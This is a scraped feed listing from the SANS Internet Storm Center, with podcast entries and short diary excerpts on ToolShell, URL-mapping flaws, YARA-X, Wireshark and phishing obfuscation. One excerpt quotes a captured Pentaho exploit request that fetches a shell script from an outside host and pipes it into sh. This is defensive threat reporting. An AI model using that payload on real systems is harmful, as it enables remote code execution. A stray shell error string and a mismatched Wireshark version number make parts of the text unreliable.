-
ISC Stormcast For Tuesday, December 2nd, 2025 https://isc.sans.edu/podcastdetail/9720, (Tue, Dec 2nd)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
![[Guest Diary] Hunting for SharePoint In-Memory ToolShell Payloads, (Tue, Dec 2nd)](/wp-content/uploads/2025/12/2025-12-02_figure1-UHamgO.png)
[Guest Diary] Hunting for SharePoint In-Memory ToolShell Payloads, (Tue, Dec 2nd)
[This is a Guest Diary by James Woodworth, an ISC intern as part of the SANS.edu Bachelor’s Degree in Applied Cybersecurity (BACS) program [1]. In July 2025, many of us were introduced to the Microsoft SharePoint exploit chain known as ToolShell. ToolShell exploits the deserialization and authentication bypass vulnerabilities, CVE-2025-53770 [2] and CVE-2025-53771 [3], in…
-
ISC Stormcast For Monday, December 1st, 2025 https://isc.sans.edu/podcastdetail/9718, (Mon, Dec 1st)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
ISC Stormcast For Wednesday, November 26th, 2025 https://isc.sans.edu/podcastdetail/9716, (Wed, Nov 26th)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
ISC Stormcast For Tuesday, November 25th, 2025 https://isc.sans.edu/podcastdetail/9714, (Tue, Nov 25th)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
Conflicts between URL mapping and URL based access control., (Mon, Nov 24th)
We continue to encounter high-profile vulnerabilities that relate to how URL mapping (or “aliases”) interac|zsh:1: parse error near `&’ ts with URL-based access control. Last week, we wrote about the Oracle Identity Manager vulnerability. I noticed some scans for an older vulnerability with similar roots today: /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23%7BT(java.lang.Runtime).getRuntime().exec(‘wget%20-qO-%20http%3A%2F%2F[redacted]%2Frondo.pms.sh%7Csh’)%7D&mgrDn=a&pwd=a This request attempts to exploit a vulnerability in Hitachi Vantara…
-
ISC Stormcast For Monday, November 24th, 2025 https://isc.sans.edu/podcastdetail/9712, (Mon, Nov 24th)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
YARA-X 1.10.0 Release: Fix Warnings, (Sun, Nov 23rd)
YARA-X’s 1.10.0 release brings a new command: fix warnings. If you have a rule that would generate a warning with a help section (explaining how to fix it), like this example rule: rule FixableCountWarning { strings: $a1 = “malicious” $a2 = “badstuff” condition: 0 of ($a*) } Then YARA-X from version 1.10.0 on can…
-
Wireshark 4.4.1 Released, (Sun, Nov 23rd)
Wireshark release 4.6.1 fixes 2 vulnerabilities and 20 bugs. Didier Stevens Senior handler blog.DidierStevens.com (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
Use of CSS stuffing as an obfuscation technique?, (Fri, Nov 21st)
From time to time, it can be instructive to look at generic phishing messages that are delivered to one’s inbox or that are caught by basic spam filters. Although one usually doesn’t find much of interest, sometimes these little excursions into what should be a run-of-the-mill collection of basic, commonly used phishing techniques can lead…
